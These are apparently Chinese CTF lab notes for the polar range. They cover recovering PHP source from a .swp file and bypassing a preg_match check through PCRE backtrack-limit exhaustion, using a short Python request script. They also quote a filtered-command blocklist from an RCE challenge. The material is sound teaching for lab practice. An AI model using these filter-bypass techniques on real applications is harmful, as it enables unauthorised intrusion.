polar靶场通关笔记

swp

啥是swp文件勒?

  • 当用vim打开文件,但是终端异常退出时系统会产生一个.文件名swp的文件。
  • 当源文件被意外删除时,可以利用swp文件恢复源文件

根据提示猜测存在swp文件,拿御剑扫一扫看到一个./index.php.swp文件

访问扫出来的路径,得到以下信息

function jiuzhe($xdmtql){ //接受一个xdmtql变量
return preg_match('/sys.*nb/is',$xdmtql); //匹配变量
}
$xdmtql=@$_POST['xdmtql'];
if(!is_array($xdmtql)){ //判断变量是否为数组类型,不为数组类型往下判断
if(!jiuzhe($xdmtql)){//利用jiuzhe函数进行匹配输入的值
if(strpos($xdmtql,'sys nb')!==false){ //绕过 preg_match函数后匹配变量,匹配到的话输出flag
echo 'flag{*******}';
}else{
echo 'true .swp file?';
}
}
else
{ echo 'nijilenijile'; //匹配到/sys.*nb/is的话输出
}
}

这段代码的重点是如何同时绕过pre_match和strpos函数,一个不让匹配到,一个又要匹配到。这里就涉及到一个回溯问题,就是pre_match函数处理的字符长度有限,如果超过这个长度就会返回false也就是没有匹配到。利用利用下面的代码进行回溯,让pre_match函数报错,绕过该函数,这样strpos函数就可以顺利的匹配到我们的字符串从而输出flag

import requests
data = {"xdmtql": "sys nb" + "aaaaa" * 1000000}
res = requests.post('自己的网址', data=data, allow_redirects=False)
print(res.content)

简单rce

一看页面返回以下代码,这一看立马进入代码审计

一审计发现不区分大小写的过滤了以下命令

cat|more|less|head|tac|tail|nl|od|vim|uniq|system|proc_open|shell_exec|popen

过滤后进行参数的匹配,需要在POST传一个yyds=666以及在GET处传一个sys的参数

接下来,该绕过的绕过,该输入的输入撒,根据过滤情况总结一些命令

polar靶场通关笔记相关推荐

  1. DVWA靶场通关笔记

    文章目录 Brute Force 暴力破解 Low Medium High Impossible 防护总结: Command Injection 命令注入 危害: Low Medium High Im ...

  2. Pikachu靶场通关笔记

    目录 Burte Force(暴力破解) 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防暴破 Cross-Site Scripting (XSS) ...

  3. Pikachu靶场通关笔记--Sql Inject(SQL注入)

    在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞.一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原 ...

  4. Upload-labs 1-21关 靶场通关笔记(含代码审计)

    目录 Pass-01(JS前端验证) 方法一:删除JS验证 方法二:先上传符合要求的图片 再在burp里面修改后缀即可 Pass-02(MIME验证) 前置知识$_FILES Pass-03(php3 ...

  5. iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)

    系列文章目录 iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客 iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的 ...

  6. [NOTE] Web For Pentester靶场练习笔记

    [NOTE] Web For Pentester靶场练习笔记 文章目录 [NOTE] Web For Pentester靶场练习笔记 前言 Web基础 PHP的session管理 HTTP认证 Web ...

  7. [NOTE] XVWA靶场练习笔记

    [NOTE] XVWA靶场练习笔记 文章目录 [NOTE] XVWA靶场练习笔记 前言 SQL Injection – Error Based 选择框 搜索栏 SQL Injection – Blin ...

  8. [NOTE] DSVW靶场练习笔记

    [NOTE] DSVW靶场练习笔记 文章目录 [NOTE] DSVW靶场练习笔记 前言 Blind SQL Injection (boolean) Blind SQL Injection (time) ...

  9. [NOTE] Pikachu靶场练习笔记

    [NOTE] Pikachu靶场练习笔记 文章目录 [NOTE] Pikachu靶场练习笔记 前言 暴力破解 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) t ...

最新文章

  1. vb.net 正则 替换 第n个_Python中正则表达式模块详解
  2. python实现计算器代码 博客园_python实现计算器
  3. java泛型 例子_关于 Java 泛型的一些有趣的例子
  4. oracle语句借书,Oracle SQL题目及其解答(借书卡、图书、借书记录)
  5. 2021.9.23模拟
  6. redhad yum 安装mysql_redhat7通过yum安装mysql5.7.17教程
  7. 解决 List 执行 remove 时报异常 java.lang.UnsupportedOperationException
  8. 【计算机科学基础】ASCII码表知识总结
  9. 大一萌新看过来,C语言学到什么程度,才能“毕业不失业”!
  10. 郭明錤:华为可能在10月开始出货鸿蒙手机
  11. 找出符合下图的互联网产品实例
  12. 使用Lazy对构造进行重构后比较
  13. 大选期间完成25亿推送:美国移动push平台Urban Airship架构解密
  14. 计算机网络安全 的论文,计算机网络安全论文6000字
  15. 电子商务法律法规【1】
  16. 电子计算机和过去的计算工具相比,电子计算机与过去的计算工具相比,所具有的特点有()....
  17. android禁用传感器,Android 系统 强制 禁用 距离传感器 方法
  18. Linux启动分析之Initramfs
  19. 区块链如何解决数据安全问题?
  20. mysql数据库取奇数行数据_查询数据库中的奇数行和偶数行

热门文章

  1. simulink怎么显示并修改scope中的图例,显示白底黑线
  2. 【C语言】getchar()和putchar()的用法
  3. NAL header
  4. SDK(3)讯飞语音
  5. div横排 html_HTML+CSS-如何定义让两个div横向排列
  6. plc secs通讯协议_SECS/GEM解决方案:PLC与MES间的通讯
  7. 阿里系独立上市计划启动,盒马打头阵不惧“市场纷乱”?
  8. hugginface/diffusers 原理
  9. 最小二乘法和均方误差
  10. 【手持地面站】T30图数传一体